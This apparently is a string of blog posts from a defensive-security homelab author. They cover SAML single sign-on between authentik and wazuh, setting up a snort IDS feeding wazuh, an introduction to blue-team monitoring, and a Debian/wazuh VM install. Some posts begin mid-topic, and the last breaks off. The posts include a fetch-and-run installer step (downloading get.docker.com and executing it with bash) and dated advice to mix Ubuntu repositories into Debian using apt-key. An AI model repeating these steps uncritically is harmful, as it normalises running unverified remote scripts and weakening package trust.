When you try opening the url with browserling it unfortunately fails to load so most likely it’s dead 💀

… but still a good IoC in the filename and IP address for future shenanigans.

and this friends is how you can report your collected IoCs / urls from malware.

IoCs

PS.: if you read until here you are my favorite! Also, I am filming the whole process right now but won't be able to publish it before the post goes out so feel free to check out the YouTube channel for a video walkthrough in the next day(s):

https://youtube.com/@maikroservice

THX 💜 and happy Hunting 🎯

Getting started with Identity Management

The first step could be to define a use-case in your IT environment (home lab or business) where you would want/need a single-sign on solution.

Let us assume you have a Security Information and Event Management System (SIEM) - and let us assume that your favorite system is wazuh (https://wazuh.com). Wazuh has it's own user database/management, and lucky for us wazuh supports external identity providers as well.

Ok, but what does an identity provider to actually?

Identity Provider Overview

Essentially, an identity provider is a piece of software that sits in the middle between your users and the service they want to use.

It takes username/password and sometimes another factor (one-time passcode, fingerprint/biometric data, key-fobs) and when the correct ones were provided it sends a token (long text) to the connected services.

These tokens allow other connected services to know WHO the user is and IF they are authenticated correctly.

authentik container setup

The easiest way to setup authentik is to use docker compose (https://goauthentik.io/docs/installation/docker-compose) - first you download the docker-compose.yml, then generate secure passwords in an environment file, define the outgoing ports and spin up the containers.

mkdir authentik && cd authentik

wget https://goauthentik.io/docker-compose.yml

wget https://get.docker.com/ -O get-docker.sh

bash get-docker.sh

# optionally - install pwgen to generate passwords
sudo apt-get install -y pwgen

echo "PG_PASS=$(pwgen -s 40 1)" >> .env
echo "AUTHENTIK_SECRET_KEY=$(pwgen -s 50 1)" >> .env
echo "COMPOSE_PORT_HTTP=80" >> .env
echo "COMPOSE_PORT_HTTPS=443" >> .env 

docker compose up -d

You can run docker ps to check if all the containers are running correctly, should look like the screenshot below.

Initial authentik admin account setup

The next step is to create a password for the default administrator account (akadamin) for authentik by visiting:

https://<IP_or_hostname_of_authentik>/if/flow/initial-setup/

Enter your admin email, and the password twice - press that Continue button and you will be logged in as the administrator.

SAML - Security Assertion Markup Language

We will use SAML to manage the single sign-on (SSO) - it is one of the many standards you will come across among Leightweight Directory Access Protocol (LDAP), Open Authorization (OAuth2).

Our SIEM wazuh can use SAML or LDAP for external auth and since LDAP usually requires a service account with a password (pretty insecure if you ask me) we will use SAML.

SAML Setup in authentik - user / group

First, I would suggest to create a dedicated user account, e.g. called wazuh-admin -

to do that click on Directory -> Users in the navigation on the left side of the dashboard.

Next up click the blue Create button in the middle of the screen.

Add a username and leave the rest as default.

Then create a group and add the wazuh-admin user into it

authentik provider

Now is the time to create a provider - providers are essentially beacons for external applications to ask for the user details and validate the tokens the user provides after login.

We can find them under Applications -> Providers and once again clicking the big blue button in the middle of the screen brings us to the form to create a new one.

We need to choose SAML as the provider type.

Then give it a descriptive name - e.g. SAML

select

• Authentication Flow (e.g. default-authentication-flow)

• Authorization Flow (e.g. default-provider-authorization-implicit-constent)

• set the ACS URL (https://<wazuh_ip_or_hostname>/_opendistro/_security/saml/acs)

• issuer (wazuh-saml)

• Service Provider Binding - Post

Leave all the rest in the advanced protocol settings as default for now and click on "Finish".

Next step is a property mapping - this is a function that takes information from the authentik users (e.g. username, email, groups) and provides it to the external service (wazuh).

We will use this to map group memberships (e.g. wazuh-admins) as backend roles that are used for RBAC (Role-based Access Control) in wazuh.

Without further ado - here is how to create a property mapping - under Customisation -> Property Mappings. Select the type and add the following details:

Name: wazuh property mapping

SAML Attribute Role: Roles

Expression:

if ak_is_group_member(request.user, name="wazuh-admins"):
  yield "wazuh-admin"

Certificate Setup

We want to secure our communication with SAML, and to do that we need a certificate that is ideally only used for the SAML setup.

Lucky for us authentik has an option to generate and import them directly - under System -> Certificates you can find the option to Generate a new one.

Give it a name and set the validity period as 365 days and click Generate

Adjust SAML Provider

Select the SAML provider and then click the Edit button - Then under Advanced protocol settings select the correct Signing Certificate and make sure to also select the wazuh property mapping in the Property mappings.

Once that is done push the Update button.

The last step on the authentik side is to create an application that uses our SAML provider.

authentik application

You can do that via the nagivation bar Applications -> Applications - Create and setting the following parameters:

• Name: wazuh-saml

• Slug: wazuh-saml

• Provider: SAML

• Policy Engine: any

Leave the UI as default or upload a logo you would like to use to identify the application in the dashboard - e.g. https://avatars.githubusercontent.com/u/13752566?s=200&v=4

The last step is to download the metadata file from the provider - or as an alternative copy the download url.

Nice - that wraps up the authentik part. Now to wazuh.

wazuh setup for SAML

The first file that we have to adjust is /etc/wazuh-indexer/opensearch-security/config.yml - open it with your favorite text editor (e.g. nano) and add the information below.

authc:
  basic_internal_auth_domain:
    description: "Authenticate SAML against internal users database"
    http_enabled: true
    transport_enabled: true 
    order: 0
    http_authenticator:
      type: basic 
      challenge: false
    authentication_backend:
      type: intern 
  saml_auth_domain:
    http_enabled: true
    transport_enabled: false
    order: 1
    http_authenticator:
      type: saml 
      challenge: true
      config: 
        idp:
          metadata_file: "/etc/wazuh-indexer/opensearch-security/idp-metadata.xml"
          entity_id: "wazuh-saml"
        sp:
          entity_id: "wazuh-saml"
        kibana_url: "https://<YOUR_WAZUH_IP_HOSTNAME>/"
        roles_key: Roles
        exchange_key: "MIIGBDCCA+SQs..."
    authentication_backend:
      type: noop

The lines that are variable are -

• idp.metadata_file - the location/name you gave the downloaded metadata.xml file - I would recommend putting it in /etc/wazuh-indexer/opensearch-security/ and naming it idp-metadata.xml.

  • keep in mind that you need to change ownership and rights on the file to make sure it is properly usable by wazuh

  •                 chown wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/opensearch-security/idp-metadata.xml
    
                    chmod 640 /etc/wazuh-indexer/opensearch-security/idp-metadata.xml
    

• idp.entity_id - if you followed this guide it is wazuh-saml - you can also see it in the metadata file

  

• sp.entity_id - if you followed this guide this is wazuh-saml

• sp.kibana_url - your wazuh dashboard url - e.g. https://wazuh.mydomain.com or https://<IP_OF_YOUR_WAZUH_VM

• roles_key - this is the name you entered into the role mapping - if you followed this guide it is called Roles

• and exchange_key - copy it from the metadata file - you can find it between the <ds:X509Certificate> and </ds:X509Certificate> tags, usually starts with MII - dont forget the " around the key

save the file and run the securityadmin.sh script from the following location:

export JAVA_HOME=/usr/share/wazuh-indexer/jdk/ && bash /usr/share/wazuh-indexer/plugins/opensearch-security/tools/securityadmin.sh -f /etc/wazuh-indexer/opensearch-security/config.yml -icl -key /etc/wazuh-indexer/certs/admin-key.pem -cert /etc/wazuh-indexer/certs/admin.pem -cacert /etc/wazuh-indexer/certs/root-ca.pem -h localhost -nhnv

if all is well, it should finish with Done with success like below

The next step is to adjust the /etc/wazuh-indexer/opensearch-security/roles_mapping.yml

open the file and scroll down until you see the following:

Now, remember the roles mapping you created earlier? In it you defined a group and the corresponding backend role that should be returned - if you followed this tutorial - it is wazuh-admin.

This role needs to be added to the roles_mapping.yml now like below:

Save the file, and run the securityadmin.sh again but this time with the roles_mapping.yml as the changed file.

export JAVA_HOME=/usr/share/wazuh-indexer/jdk/ && bash /usr/share/wazuh-indexer/plugins/opensearch-security/tools/securityadmin.sh -f /etc/wazuh-indexer/opensearch-security/roles_mapping.yml -icl -key /etc/wazuh-indexer/certs/admin-key.pem -cert /etc/wazuh-indexer/certs/admin.pem -cacert /etc/wazuh-indexer/certs/root-ca.pem -h localhost -nhnv

once again, if all goes well it should return - Done with success

Now the last three steps - first we check /usr/share/wazuh-dashboard/data/wazuh/config/wazuh.yml

The line that interests us is the last one - run_as if that one is set to true we can change it to false.

The penultimate task is to add a role to wazuh - open the dashboard - click on the arrow next to the wazuh logo then on Security and Roles mapping.

We will now add a new role mapping - give it any descriptive name add the respective Roles -> in this case administrator and add a new custom rule at the bottom that matches (FIND) the user_name to wazuh-admin.

Save the role mapping.

The last step is to add saml authentication to /etc/wazuh-dashboard/opensearch_dashboards.yml

Add the following lines to the file:

opensearch_security.auth.type: "saml"
server.xsrf.allowlist: ["/_opendistro/_security/saml/acs", "/_opendistro/_security/saml/logout", "/_opendistro/_security/saml/acs/idpinitiated"]
opensearch_security.session.keepalive: false

after the change, the file could look something like this:

now restart the wazuh-dashboard service and when you visit the wazuh dashboard you will be greeted by the authentik login.

if you login as the wazuh-admin user you will be forwarded to wazuh as wazuh-admin 🎉🎉🎉

Thank you to Videothek for the brain teaser - this one took the better part of 4 weeks to figure out correctly because there was no documentation how to achieve this.

If you like this content - you can check out https://maikroservice.com/email for more content like this.

Commonly used open source solutions for IDS are snort and suricata, today we will look at snort and setting it up from scratch in your home lab.

Cool, but how does and IDS work actually?

Overview - What is an IDS/IPS?

The Intrusion Detection System analyzes all traffic either via port mirroring - essentially, cloning all packets and analyzing them - or acting like a gateway, which is similar to airport security, everyone needs to pass before they go in/out.

The software then compares the data inside the packets to predefined rules - these can range from regular expressions to more sophisticated integrations - essentially they all do the same though.

They compare data to known malicious indicators.

The plan

Today we will do the following things:

1. install snort on debian virtual machine

2. configure snort

3. install wazuh agent

4. forward snort logs to wazuh

5. optional - download and install rules from emerging threats

Are you ready? Ok, without further ado - here we go.

1 - Install snort on debian

I assume in this post that you have a virtual machine with debian on it, should you want support in how to set this up check out this post:

https://maikroservice.com/setting-up-wazuh-as-your-siem-on-debian-12-proxmox-a-step-by-step-guide

Start the Virtual Machine - Once the VM is booted the installation process for snort is a single command inside your terminal:

sudo apt-get install snort -y

Adding the ubuntu repository to your apt lists

If you see this:

Fear not - we have a solution. Recently, debian appears to have removed snort from it’s repositories - so now we need to add a new repository manually to install snort (another option would be to install from source, but that is more brain-intensive and not part of this post).

The first file you need to open is /etc/apt/sources.list. This file contains all the repositories that apt is able to query for packages. If you try to install one, which is not available, apt tells you that it cannot find the package.

AHHH, so that is what happened here?!

Exactly. Open the sources file e.g. with vim , nano or your favorite text editor (make sure you are using sudo rights or are logged in as root)

and add the following line to the bottom:

deb http://de.archive.ubuntu.com/ubuntu/ jammy main restricted universe multiverse

Afterwards, your sources.list should look something like this:

Great, close the file (make sure to save it!) and update your local apt cache by running sudo apt-get update

Umm… this fails?!

Aha! Apparently, it’s not as simple as adding this one line, we also need to add a public key so that our local system can verify the integrity of the remote apt cache.

Lucky for us this is a single command where you need to add your public key identifier:

apt-key adv --keyserver keyserver.ubuntu.com --recv-keys <the_public_key_identifier_you_copied>

Wonderful, now try to update your apt cache again with: sudo apt-get update.

BINGOOOOO. That worked, and now you can install snort with:

sudo apt-get install snort -y

Once the prerequesites are installed snort might ask you to configure the starting setup properly - the first thing you have to do is enter your local network that needs scanning.

You need to use the CIDR notation, if you are unsure what that is ask your favorite search engine or GPT buddy for support with subnetting - or leave me a comment and I will try to answer as many as possible!

Once that is done make sure to check if snort was installed properly by running snort -v - if you receive bash: snort: command not found make sure you are in a privileged context (e.g. sudo snort -v or su - && snort -v).

Great, that was the installation process of snort - you did very well 🤘.

Now we need some configuration to make sure snort works properly.

2 - snort configuration

By default snort (2.9.xx) has the following interesting locations - /var/log/snort and /etc/snort.

The former holds all the logs that snort produces, the second one holds the configuration file - snort.conf we are interested in.

Open the /etc/snort/snort.conf file with your favorite text editor e.g. nano /etc/snort/snort.conf.

Now scroll down to Step #6 and find the lines below:

You need to change the following line(s) and save after:

output alert_fast: snort.alert.fast

# change it to
output alert_fast: snort.alert

# optional but suggested, remove the # before 
# the #output alert_syslog: LOT_AUTH LOG_ALERT line

Great, we adapted the configuration file, but umm...

Why?
What does that change do?

Great questions - The line alert_syslog: LOG_AUTH LOG_ALERT tells snort to log stuff related to authentication and alerts via syslog.

Cool but umm... What's syslog?

Why is this important?

Your Security Information and Event Management System (SIEM) has integrations for syslog so events that are inside the syslog will by default be connected to your SIEM already - win <> win situation!

Ok cool, but what about the other change we made to the configuration file?

That one took me a while to find/figure out - By default snort stores log data in pcap format - this is a binary format that e.g. Wireshark uses to store network traffic information.

Great for the computer, not so great for our SIEM - because it cannot read the format 😅

What we did with output alert_fast: snort.alert is the following:

We use the alert_fast module which stores data in readable text (good for us + SIEM) and tell it to use the snort.alert data stream (all the alert data) for logging - documentation (2.6.2): http://manual-snort-org.s3-website-us-east-1.amazonaws.com/node21.html#SECTION00363000000000000000

Great, now our snort install is almost ready to throw alerts. The penultimate step is to restart snort.

sudo systemctl restart snort

...and then...

You should be able to see one or two new files inside /var/log/snort called snort.alert.fast and maybe even snort.alert.fast.1 - this is good, it is exactly what we want!

The only thing left is to create a simple test rule. Let's do that next.

Rules and Tests

We will now create a rule that watches for ICMP (ping) traffic and alerts when it finds any. Disclaimer - Since this is a fairly common interaction inside the network you will see a lot of alerts - do not use this in production unless you know what you are doing 🤘

Rules are stored under /etc/snort/rules - the one we are looking for is called local.rules.

We need to add the following line:

alert icmp any any -> any any (msg:"ICMP connection attempt:"; sid:1000010; rev:1;)

This means back to front - we are in revision:1 , the unique id of our rule is 1000010 and the message we will put into the log is ICMP connection attempt: followed by the actual information from the packet.

Save the changes and then we can test the rule.

Testing local rules

Lucky for us snort has an integrated feature that allows us to test newly created/changed rules. We can use:

snort -q -A console -c /etc/snort/rules/local.rules

to test the rule we just created - this will run snort and wait for traffic that matches the rule. If you don't see any after a minute or two you can create it yourself.

ping -c 20 <IP_OF_SNORT_VM>

This sends 20 ICMP requests to the snort VM and will trigger the rule 20x 😈 - results might look similar to (without the typo hopefully 😅):

Cool - we have a working rule and a running IDS - now we install and connect our Security Information and Event Management System (SIEM).

wazuh linux agent installation

In order to install the wazuh agent you can follow the exact steps here: https://maikroservice.com/setting-up-wazuh-as-your-siem-on-debian-12-proxmox-a-step-by-step-guide#heading-install-linux-agent

Afterwards, your agent should show up in the wazuh dashboard but it will not have any IDS alerts (yet). Because, this is what we cover in the next step!

snort <> wazuh connection

In order to see the alerts in wazuh we need to modify the /var/ossec/etc/ossec.conf file + add a new localfile entry like below and save the file.

<!-- snort -->
<localfile>
  <log_format>snort-full</log_format>
  <location>/var/log/snort/snort.alert.fast</location>
</localfile>

You can place the section right below the <!-- log analysis --> part in the configuration file.

That was it, the connection to wazuh is now setup and we only need to restart the wazuh agent to finish the integration.

sudo systemctl restart wazuh-agent

If this throws no errors you are good to go.

Go check your wazuh dashboard and click on the eye symbol next to the agent at the bottom right.

This will bring you to the following overview. This dashboard holds all the events that your agent has collected.

But... where are my IDS events?!

Those are behind the next click - security events in the top left.

Which brings you to the most important dashboard to look at for now - and if all went well - you see a lot of alerts from ids - your intrusion detection system - aka snort 🥳💜🎉 .

Congratulations you did very well and now have a running IDS in your network.

It is a combination of multiple security disciplines combined for ease of speech. Similar to how Red Team sometimes means pentester as well. Wrong, but socially accepted. But you might still have the question - Which Blue Team disciplines exist?

Blue Team Disciplines

Blue Team tasks typically consist of the following disciplines:

1. Monitoring 👀

2. Analytics 🧮

3. Hardening 🪨

4. Incident Response 👩‍🚒

5. Threat Hunting ⚡

In this post, we will cover the Monitoring Discipline one by one with example tasks and things you need to know about it. So without further ado here is the overview of Monitoring:

Summary

Monitoring is a combination of Logging, Detection, Visualization and Inventory Management:

• SOC / SIEM

  • Alerting

  • Event Triage

  • Dashboards

• Inventory (Machines, Cloud Assets, People, Services)

• Networking

  • Internal Firewalls + Web Application Firewalls (WAFs)

  • Network Access Control (NAC)

  • Virtual Private Networks (VPN)

  • DNS Sinkholes

• Packet & Protocol Tracking (Network Monitoring)

That is A LOT of words you might not have heard before - but fear not, I will share all the necessary details.

A job that is often associated with monitoring is called SOC Analyst - or Security Operations Center Analyst.

In simple Terms - Monitoring explained for aspiring Blue Teamers

Monitoring means collecting Logs and looking at graphical representation of them.

Uh... what?
Why do computer nerds collect parts of trees? 🪵

...and why ON EARTH do they look at paintings of them? 🎨🖌️👩‍🎨

Well... almost

Logs are Log files or even streams.

Aha. Why would I need them?

Imagine you have a web application and someone tries to hack it.

How do you know?

Better: How would you know?

Well... I would know if I get hacked... RIGHT!? Kinda.. but also - no.

That is way too late.

Remember the 5 stages of ethical hacking?

1. Reconnaissance

2. Enumeration & Scanning

3. Initial Exploitation - Gaining Access

4. Lateral Movement & Privilege Escalation - Maintaining Access

5. Cleanup

Imagine you get hacked, if we take our previous assumption that we would only find out once the attacker has access - that is after Step 3.

What if we wanted to catch them at Step 1 or 2?!

HELLOOOO LOGS. 🪵🪓

Now how do you find logs, if you cannot go to the hardware store or the forest to collect them?!

And what do they look like? Those are the right questions!

AND we will answer them today.

SOC - Security Operations Center

The Security Operations Center is a team of individuals who watch logs to identify threats and compromises. This team typically operates in 24h / 7 days a week mode for 365 days of the year. Each SOC analyst works in shifts, similar to nurses in hospitals.

It is hard to find good SOC personnel, so companies often outsource the SOC to MSSPs - Managed Security Service Providers. These are companies that specialize in SOC and sometimes even Incident Response.

The tool every SOC uses is called SIEM - Security Information and Event Management System.

SIEM - Security Information and Event Management System

A SIEM is basically a software tool that allows you to collect and analyze log files.

Log files are text files that contain logging information - these can be operational data for computers (e.g. user logins & created files) or services (Web Application, Authentication Service, Domain Name Service - DNS).

These log files are collected, normalized (transformed) and used to build dashboards. Dashboards consist of graphs/charts and alerts.

Alerting

Alerts are based on detection rules, which specify actions or filenames that are considered malicious. The process of checking the local files is called File Integrity monitoring - you usually need to mention which folders / disks should be checked and the more folders, the more data is stored.

This is also an issue because a lot of data means SOC analysts can be hit by alert fatigue. This "disease" happens when you see so many (false positive) alerts and become desensitized to future ones - a dangerous situation because the next one could be real.

Less is more, focus on high-impact alerts first and foremost.

For those of you wondering - OK great, but how can I get started with Security Information and Event Management Systems?

Check out this post: https://maikroservice.com/how-to-setup-wazuh-as-your-siem-with-debian-proxmox.

It will guide you through the setup and requirements of a SIEM for your homelab, which gives you invaluable experience for the job hunt. I cannot stress this enough - if you do not have job experience, build it yourself with a homelab and simulated attack scenarios.

After the alert a SOC analyst needs to decide how bad the situation is and what to do next - this process is called Triage.

Triage

Triage is at least the 2nd most important task of a (future) SOC analyst.

As a Junior SOC Analyst, you would watch the dashboards and alerts and if something happens you gather information and create a ticket.

You have a tiered model - level 1 is junior analysts, level 2 is intermediate analysts and level 3 is team lead / seasoned professionals - The ticket flow is similar to a pyramid. At the bottom, the level 1 analysts look at the majority of alerts and forward the ones they deem interesting.

For each (in an ideal world) alert, a ticket is created and valuable information is added.

These tickets are forwarded to the next higher level and then categorized (triaged), level 1 analysts can also triage the tickets already, depending on the setup.

Ok, but how do analysts know which data point is important?

They use dashboards to visualize the events.

Dashboards

Dashboarding (I hope this is a word) is the process of visualizing data using graphs and tables. Typically, this is done with the SIEM software but outside of security dashboards are also used for data analytics and reporting (e.g. sales, or marketing data).

These dashboards can be used to have a quick look at the status quo or dive down into data points, e.g. analyze events on a specific machine after an alert was raised.

What you need to understand the alerts properly is a deep understanding of how logs work - up next.

Logs in Detail

Logs are flat files - sometimes JSON, sometimes CSV, sometimes TXT files.

Sometimes what now?

JSON - JavaScript Object Notation

CSV - Comma Separated Values

TXT - Text

These are some of the different formats that Log files can come in.

Can you give me an example of what those look like?

Sure - glad you asked:

# JSON (pretty)
{
  "UUID": [
  {
    timestamp: "2022-11-02T20:57:38+00:00", 
    user: "admin", 
    action: "login", 
    page: "admin.php"
  }
  ]
}

# CSV
timestamp,user,action,page
"2022-11-02T20:57:38+00:00","admin","login","admin.php"

# and TXT
timestamp,user,action,page
"2022-11-02T20:57:38+00:00", "admin","login","admin.php"

Wait CSV and TXT look exactly alike?!

Yes, that could very well be - sometimes the delimiter (the character between the individual entries) changes from , to ;

but TXT is often "just" CSV with a different file extension.

Now what/who generates these things and who defines the format?

Log files are produced by almost all modern applications and operating systems.

Which is kind of an answer to - How do we find logs?

Applications produce them - NICE!

But let's dive deeper - so these are application logs - and a full-fledged web application produces different logs compared to for example Microsoft Word or Excel.

Why?

Word & Excel are single-user local applications (they can also be used in browsers now, I know.)

While Web Apps are distributed.

That means that many users use the same application, plus the servers that host the application are typically spread around the world 🗺️

What do you think would be different between the logging of these two types of applications?!

Let's make it even more complicated.
What if your Operating System also produces Log Files.

What do you think is in there?
Would that look different for Windows, Linux and MacOS?
Where do I even find these logs?
Are they on by default?
Do people spy on me w/ logs?

Let us slowly dive into the different types of logs -

Application Logs are different from System Logs.

There might be more types but those two are enough for now.

Application Logs show user interactions with the app
+ they show which service talked to which IP/other service.

Why?!

User Input is the most dangerous thing on the internet

Worse than Sharks, Snakes, Spam Emails and Phishing combined.

It is how companies get hacked, how everyone gets hacked.

So we save it to logs.

We want to know if a user tries to hack us, right?!

NOT SO FAST!

Welcome GDPR and other regulations.

You cannot just log everything a user does, you need their consent - and even with that, you shall only save necessary and minimal amounts of data.

so you don't log everything... ok.

Do you log anonymized interactions?!

That is better. But now you don't know WHO tries to hack you.

And for now, that is not that important, for Monitoring + Security you care about the User Input first + maybe the IP

Two things to think about -
What happens to your account if someone hacks your password?

What happens if a user uses a VPN?

Think about those and leave a comment below with your answers.

Back to Logging: As Blue Teamers, we want to know which input breaks our application.

So that we can (tell the developers to) fix it!

Application Logs = User Input + Services talking

What about System Logs?

Your Operating System creates logs on your interactions as well.

Why?

Product Improvements, Troubleshooting, Support of IT staff at your company and many other reasons.

Got it, seems legitimate.

What is in there though?

To answer this question - let us first find the logs!
The hunt begins.

Linux & MacOS store System logs in /var/log

While Windows 1. mostly calls them Events and 2. stores them at: C:\Windows\system32\winevt\Logs by default (Windows 7/8/10/11).

How can I read them?

MacOS -> console.app
Linux -> text reader (e.g. less)
Windows -> Windows Event Viewer (eventvwr.exe)

Nice and last question - How can I make sure that all of them are aggregated in one place for System Monitoring in a Business Network / Home Network?!

That is exactly what a SIEM is for, but you need to make sure to know how many devices belong to your company.

How? Inventory Management!

Inventory (Machines, Cloud Assets, People, Services)

Knowing how many total laptops, servers, mobile phones and cloud storage buckets you have in your company is ... hard, very hard actually. Because employees are quickly onboarded / offboarded, can also autonomously buy hardware and use cloud accounts this often leads to confusion.

The larger the organization the worse this gets. BUT it is essential to keep track of the hard and software in your company.

Only when you know it exists can you monitor the device/service. No monitoring, no visibility means this device can be hacked and you would not know about it.

To make matters even more interesting, in 2023 infrastructure is usually distributed across multiple data centers with content delivery networks and load balancers in between. If those words do not mean anything to you now, that is totally fine.

The idea behind my mentioning all of this was to show the complexity of a "simple" website in 2023. It can quickly get out of hand when engineering takes the reigns and moves forward.

Keeping inventory is at the interface of analytics, whenever you see a new IP/device in your logs you might want to check where it comes from.

This leads us to the next topic - networking.

Networking

Each device in your business environment will most likely connect to other devices in the same department.

When you are a remote/global company this department might be filled with people from South America to Japanese employees all working on the same projects.

That is a lot of ground to cover and you need both the internet and internal networks to enable collaboration.

These internal networks need to be protected and one of the classics is to use a firewall.

Firewalls

Speaking about firewalls means that we have a network or service that needs protection. These networks can be internal and hold confidential documents or they can be part of our Web Application infrastructure for example. The latter also needs protection but needs a different kind of firewall - a Web Application Firewall (WAF).

Why can you not use one for the other?!

Well, one might be a hardware firewall and the other one might be software, there might be different threats associated with each environment etc. - but you could. You could probably figure out how to use one for the other when money is tight or hidden costs (time investment for figuring out which vendor to go with) are deemed too high.

Generally, firewalls protect you against unwanted access e.g. by blocking traffic from specific ports.

Okay, but what is a port?

Good question, which is interlinked with the next chapter but I wanted to show you that there will be a lot of concepts that you might or might not understand immediately.

What is important though is that you focus on learning concepts rather than specific technologies/hardware/tools. In the end, the technology will most likely change over the course of your career but the concepts will stay the same.

Oh, and a port is a specific software address that applications/machines can connect to on a computer. It's similar to a loading dock in a factory or stop in a bus terminal, you need to be in the correct place to be picked up and take the bus / get the delivery.

How would you allow/deny access to the networks? Besides a Firewall you can use Network Access Control (NAC).

Network Access Control (NAC)

Network Access Control measures allow / deny people to connect to your network of choice based on certain conditions.

What are those?!

You can decide, but some examples include:

• Tiered networks (e.g. separate guest and employee networks)

• Bring your own device policies (someone wants to use their private phone for work, which means they have e.g. to enroll in device management, keep the phone operating system up to date and can only install certain apps)

• Compliance policies (e.g. anyone who wants to connect to your network via cable or wifi needs to have a registered device which is actively managed by the device management)

Another access control measurement would be to have a virtual private network (VPN) for your employees.

Virtual Private Networks (VPNs)

VPNs as their name suggests are virtual networks that need some kind of authentication or configuration file to get into. There are two types of VPNs - mesh-style networks and server-based networks.

Mesh-style networks can be represented by wireguard, while server-based networks can be initiated using OpenVPN.

For a more in-depth walkthrough check out this Twitter thread: https://twitter.com/maikroservice/status/1673811963070017538

If you want to be extra sure that no malicious traffic enters/exits your company networks you can also use a DNS sinkhole.

DNS Sinkholes

DNS Sinkholes are basically blackholes for domain name server (DNS) traffic. DNS translates human-readable domain names (e.g. maikroservice.com) to IP addresses (76.76.21.21).
If one of the devices in your network tries to access a known malicious url, your DNS server would respond with a "wrong" IP that does not lead to the hacker domain.

This can be combined with an allowlist - which defines the allowed domains anyone in the company can access.

The combination of a DNS sinkhole and an allowlist provides a layered approach to security. Malicious or unauthorized domains are diverted away from their intended destinations, while trusted domains on the allowlist are granted unblocked access.

If you cannot use an allowlist you need to check the network traffic closely - also called network monitoring.

Packet & Protocol Tracking (Network Monitoring)

When you join a new company as a consultant the first thing you tackle is to get a lay of the land - you try to figure out how bad the current situation is and which future action will have the highest impact.

You would also try to establish a baseline - what exactly is considered normal in this environment, what would an attack on a high-value target look like and can we detect it easily?

The toolset you would bring to this section consists of Wireshark (packet analyzing software), an Intrusion Detection and Prevention System (IDS/IPS) and probably DNS/Proxy Server logs combined with Linux command line tools (e.g. grep, awk, sed and others).
If you want to learn more about those command line tools, check out this video: https://www.youtube.com/watch?v=zNa6G7KOGXc.

Sometimes the logs you are looking for are not in the correct format and you need support, there might be help available.

Logging as a Service

If you are in a situation where your logs look like a pile of lego stacked on top of each other - you might need help.

Some organizations might be unaware of the amount of Log Aggregation / Transformation necessary to make sense of logs and the underlying traffic/behavior patterns.

You can work with external partners to identify potential high-value log sources, transform and combine different ones and build dashboards/alerts on top of the logs in your SIEM.

If you want to do threat research or learn more about the ins and outs of security monitoring it is time to start your own home lab.

Getting started

We will use a plain Debian image (iso) which you can download from: https://cdimage.debian.org/debian-cd/current/amd64/iso-dvd/. Make sure that the SHA256 or SHA512 hash of the file you downloaded matches the original one. You can see the expected hash in this file: https://cdimage.debian.org/debian-cd/current/amd64/iso-dvd/SHA256SUMS

# add the correct filename
sha256sum <debian-12.1.0-amd64-DVD-1.iso>

Setting up the virtual machine on proxmox

Once that is done and the iso is added to proxmox (if you want to learn how to do that: https://maikroservice.com/how-to-upload-iso-files-to-your-proxmox-server) you can create a new virtual machine with the blue button in the top right corner of your proxmox interface.

Now give it a name and click "Next", in the next window select the operating system that you want to use for the wazuh machine - we use Debian 11/12 and click "Next".

In the System window select the Qemu Agent checkbox, and leave the rest as it is.

Next up we need to decide how much power our SIEM server needs. The documentation recommends the numbers below but we will adjust them slightly.

In the disk setup, make sure to use enough disk space for the VM, wazuh recommends around 50GB per 90 days of storage, since my SIEM does not run 24/7 I chose 50GB total disk space.

The number of CPU cores (4) was taken from the recommendations in the wazuh documentation. This is plenty, you might also get away with 3.

For memory, I have been using 4GB (4096 MB) and it is running smoothly with 4-8 agents reporting to the SIEM. If you have more memory to spare, you can generously upgrade this to 8GB (8192 MB).

For a network device, we use the classical VirtIO (paravirtualized), if you have installed another network bridge outside of vmbr0.

Next up we confirm all the settings and press the Finish button.

Installing debian on the VM

You now have to install the operating system on the virtual machine, which automatically begins after you start the virtual machine.

I suggest the graphical install option for visual pleasantries.

First up is selecting a language - use your favorite one, we will go with plain old English.

Next up is the location selection - this will be used later on for time zones as well so make sure to select the correct one for you and press the continue button.

Now you need to choose the correct keyboard layout and hop on to the next selection screen.

User setup debian

It is time for your computer to get a name, choose something descriptive or stay by your naming scheme.

If your SIEM should be part of an Active Directory Domain you can add the name of the domain now - you can also set it up later in case you are not sure right now.

Debian will set up at least two users for you - one root user (admin) and one normal user.

First, you enter the password for the root (system administrative) user twice and once that is done you can give your normal user a name.

This user is the one you would log in with for daily operations, make sure you remember this name or add a note to the VM.

Once the username is selected you enter a password for this user twice and continue onwards.

Now comes the time zone selection, remember earlier when I said that this is limited by the country you choose? Hopefully you selected the correct one and can find your time zone now, otherwise either choose a random one and change it later or go back to the country selection.

Disk setup debian

Next, you can opt to choose a guided or manual approach to setting up the disk for your debian installation. I suggest you use the first option Guided - use entire disk.

The next three steps are single select & continue workflows. First is the disk selection, you probably have only one disk available if you followed the process until now. Choose that one and continue.

We are now able to choose if you want different partitions (think of "virtual hard drives") or a single one - I suggest using the single one for ease of use.

Now all the details are figured out and you need to finally confirm the partitioning + disk erasure.

Confirm once more and you are done with the disk setup.

Software setup debian

You will want your debian to be and stay up-to-date and to achieve that you need software updates. The first selection screen will give you the option to load packages/libraries from a USB disk/external hard drive. Since you most likely don't have one you can choose No and continue.

debian uses apt (Advanced Package Tool) for most of the software installation. Apt works with mirrors + archives which hold the actual libraries you want to install and since the world is a big place you can choose the mirror location closest to you to have minimum latency.

You can leave this in the default setting, it should not have much impact on your daily work.

Now comes the actual mirror selection, just leave this at deb.debian.org and continue.

If your internet is proxied you can now enter the correct proxy information - if you have not set one up then leaving this blank is most likely the right choice.

Now comes the option to share anonymous usage data for the packages you installed/use - I choose No because I don't like telemetry data collection, anonymous or not.

The next step is a little confusing if you are doing this for the first time - but fear not you can do it.

This selects your desktop environment (if you want one) - the default setting is Debian desktop environment, GNOME, and standard system utilities. I prefer KDE (taskbar at the bottom, similar to Windows/Mac) over gnome and thus have chosen Debian desktop environment, KDE Plasma and standard system utilities.

You could also get away without the desktop environment and would then probably need the SSH server to connect easily to the VM.

If this interests you let me know in the comments and we can dive deeper into how that setup would look.

Finishing debian installation

The penultimate step is to set up the grub boot loader which is accomplished by choosing yes to the question below.

Last but not least we need to install said boot loader on the (only) disk we have and that is the last step of the debian install.

Reboot and login as the user you defined earlier.

Installing wazuh SIEM

The first thing you have to do is visit https://documentation.wazuh.com/current/quickstart.html#installing-wazuh and copy the command shown.

There is one more task before the install process can commence - debian by default does not have curl installed so we need to do that.

You can copy the commands below to get it started.

# first we become root so that we can install packages
su -
# next install curl
apt-get install curl
# and install wazuh
